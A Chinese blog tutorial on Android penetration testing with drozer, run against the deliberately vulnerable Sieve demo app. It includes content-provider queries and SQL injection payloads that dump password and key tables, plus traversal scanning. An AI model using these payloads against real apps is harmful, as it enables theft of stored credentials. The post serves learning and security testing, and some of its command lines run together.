利用drozer进行Android渗透测试 - AndroSecurity

时间 2014-08-12 01:10:00 博客园-原创精华区 原文  http://www.cnblogs.com/goodhacker/p/3906180.html 主题 Drozer Android 渗透测试

一、安装与启动

1. 安装  

第一步:从 http://mwr.to/drozer 下载Drozer (Windows Installer) 

第二步:在 Android 设备中安装 agent.apk

adb install agent.apk

2. 启动

第一步:在 PC 上使用 adb 进行端口转发,转发到 Drozer使用的端口 31415 

adb forward tcp:31415 tcp:31415

第二步:在 Android 设备上开启 Drozer Agent

选择 embedded server-enable

第三步:在 PC 上开启 Drozer console 

drozer console connect

二、测试步骤

1.获取包名

dz> run app.package.list -f sievecom.mwr.example.sieve

2.获取应用的基本信息

run app.package.info -a com.mwr.example.sieve

3.确定攻击面

run app.package.attacksurface com.mwr.example.sieve

4.Activity

1 )获取 activity 信息 

run app.activity.info -a com.mwr.example.sieve

2 )启动 activity 

run app.activity.start --component com.mwr.example.sievedz> help app.activity.startusage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY][--component PACKAGE COMPONENT] [--data-uri DATA_URI][--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]][--mimetype MIMETYPE]

5.Content Provider

1 )获取 Content Provider 信息 

run app.provider.info -a com.mwr.example.sieve

(2)Content Providers (数据泄露)

先获取所有可以访问的 Uri :  

run scanner.provider.finduris -a com.mwr.example.sieve

获取各个 Uri 的数据: 

run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

查询到数据说明存在漏洞

(3)Content Providers SQL 注入) 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

报错则说明存在 SQL 注入。

列出所有表:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

获取某个表(如 Key )中的数据: 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

4 )同时检测 SQL 注入和目录遍历 

run scanner.provider.injection -a com.mwr.example.sieverun scanner.provider.traversal -a com.mwr.example.sieve

6.Service

(1)获取 service 详情 

run app.service.info -a com.mwr.example.sieve

7. 其它模块 

shell.start 在设备上开启一个交互shelltools.file.upload / tools.file.download 上传/下载文件到设备tools.setup.busybox / tools.setup.minimalsu 安装可用的二进制文件

更多相关文章

  1. webKit For Android
  2. Android开发环境配置
  3. 编译android源码
  4. Android(安卓)中数据库查询方法 query() 中的 selectionArgs 的
  5. Ubuntu下配置Android
  6. Android(安卓)使用 MPAndroidChart 实现折线图
  7. mybatisplus的坑 insert标签insert into select无参数问题的解决
  8. Pycharm安装PyQt5的详细教程
  9. python起点网月票榜字体反爬案例

随机推荐

  1. Eclipse SDK 3.7.2无法安装android SDK
  2. Android与H5相机、相册笔记
  3. Android(安卓)NDK学习笔记3-入门案例篇
  4. 【Android学习之旅】1、Android入门介绍
  5. Android(安卓)Animation
  6. 详解Android轻量型数据库SQLite
  7. 英特尔® Android* USB 驱动程序安装指南
  8. Android 技术专题系列之九 -- 图形系统
  9. 关于查看Android系统源码【Written By Ki
  10. android layout Java代码生成器